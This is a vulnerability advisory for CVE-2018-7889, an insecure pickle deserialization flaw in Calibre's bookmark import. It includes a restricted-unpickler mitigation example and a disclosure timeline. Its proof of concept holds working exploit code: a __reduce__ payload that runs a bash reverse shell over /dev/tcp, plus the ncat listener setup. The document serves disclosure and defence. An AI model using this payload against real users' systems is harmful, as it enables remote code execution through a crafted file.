A malicious pickle file can be used to trigger remote code execution in Calibre E-book Manager.
This vulnerability affects all operating systems Calibre supports and is present in the latest version (3.18) of the application.
Calibre E-book Manager uses the Python pickle module for serialization in multiple places. This is a dangerous pattern because the deserialization of malicious pickle data can result in the execution of arbitrary Python code.
There is one specific functionality in Calibre where the use of pickle can be leveraged by an attacker to obtain code execution by social engineering a target.
Calibre allows users to export and import bookmark data from a
src/calibre/gui2/viewer/bookmarkmanager.py contains code that imports a previously exported file containing bookmark information. This file data is directly passed into
```python
files = choose_files(self, 'export-viewer-bookmarks', _('Import bookmarks'),
    filters=[(_('Saved bookmarks'), ['pickle'])], all_files=False, select_only_single_file=True)
if not files:
    return
filename = files[0]

imported = None
# The user-chosen file is handed straight to cPickle.load with no validation,
# so any callable referenced by the pickle stream runs during the load.
with open(filename, 'rb') as fileobj:
    imported = cPickle.load(fileobj)
```
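The following is an added defender-side illustration, not code from this advisory or from Calibre. It assumes Python 3's pickle module (the advisory's snippets are Python 2 cPickle), a constructed bookmark list in place of a real export file, and the harmless os.getcwd as the callable embedded through __reduce__. It shows why the stock loader is unsafe, and how a restricted Unpickler whose find_class() refuses every global outside a small builtins allow-list stops the callable from ever being resolved:

```python
import builtins
import io
import os
import pickle

# Bookmark exports are plain data: a list of dicts holding strings and numbers.
# Only these builtins are ever needed to rebuild such data, so nothing else
# (os.system, subprocess.*, ...) is resolvable while unpickling.
SAFE_BUILTINS = frozenset({
    "dict", "list", "tuple", "set", "frozenset",
    "str", "bytes", "int", "float", "bool",
})


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler whose global lookup is limited to a small builtins allow-list.

    pickle resolves every GLOBAL/STACK_GLOBAL opcode through find_class(), and a
    __reduce__ payload needs exactly that lookup to obtain its callable.
    Refusing the lookup means the callable is never reached.
    """

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_loads(data: bytes):
    """Deserialize with the restricted unpickler; forbidden globals raise."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_bookmarks(data: bytes) -> list:
    """Load an exported bookmark file and check its shape after unpickling."""
    obj = safe_loads(data)
    if not isinstance(obj, list) or not all(isinstance(b, dict) for b in obj):
        raise ValueError("bookmark file did not contain a list of dicts")
    return obj


def is_rejected(data: bytes) -> bool:
    """True if the restricted unpickler refuses the data."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


# --- constructed sample inputs (not real Calibre export files) ---------------

SAMPLE_BOOKMARKS = [
    {"title": "Chapter 1", "pos": "epubcfi(/6/4!/4/2)", "type": "cfi"},
    {"title": "Chapter 7", "pos": "epubcfi(/6/16!/4/10)", "type": "cfi"},
]
BENIGN_FILE = pickle.dumps(SAMPLE_BOOKMARKS, pickle.HIGHEST_PROTOCOL)


class CallOnLoad:
    """Stand-in for a __reduce__ payload: unpickling it calls os.getcwd(),
    a harmless function chosen only to make the mechanism observable."""

    def __reduce__(self):
        return (os.getcwd, ())


HOSTILE_FILE = pickle.dumps(CallOnLoad(), pickle.HIGHEST_PROTOCOL)


def stock_loader_runs_callable() -> bool:
    """Plain pickle.loads resolves and calls the embedded function."""
    return pickle.loads(HOSTILE_FILE) == os.getcwd()


if __name__ == "__main__":
    print("benign file loads:", load_bookmarks(BENIGN_FILE) == SAMPLE_BOOKMARKS)
    print("stock loader ran the callable:", stock_loader_runs_callable())
    print("restricted loader rejected it:", is_rejected(HOSTILE_FILE))
```

The allow-list is the mitigation if pickle must stay; the shape check after loading is a second line of defence against files that unpickle cleanly but carry the wrong structure. For a user-exchanged format like bookmark exports, a data-only encoding such as JSON removes the problem class entirely, since it has no notion of resolving callables at all.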
Proof of Concept
For the proof of concept, we will use a malicious pickle generated by the below
```python
import cPickle
import os
import base64
import pickletools


class Exploit(object):
    def __reduce__(self):
        return (os.system, (("bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"),))


with open("exploit.pickle", "wb") as f:
    cPickle.dump(Exploit(), f, cPickle.HIGHEST_PROTOCOL)
```
The exploit will make a reverse shell to a listener on 127.0.0.1:8000, so we set that up using
```
$ ncat -nlvp 8000
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 125E F683 5DA6 153A 6E26 E957 0C92 4706 2596 347C
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
```
We open an ebook and navigate to the "Bookmarks" icon on the left of the screen and click the "Show/hide bookmarks" menu item. We then click the "Import" button on the bookmarks pane and select the generated file. This should trigger a reverse shell on our listener.
This issue was discovered by Ayrx.
- 02 Mar 2018 - Vulnerability discovered.
- 07 Mar 2018 - Vulnerability reported to the vendor.
- 07 Mar 2018 - Vulnerability fixed by vendor in commit
- 09 Mar 2018 - CVE-2018-7889 assigned.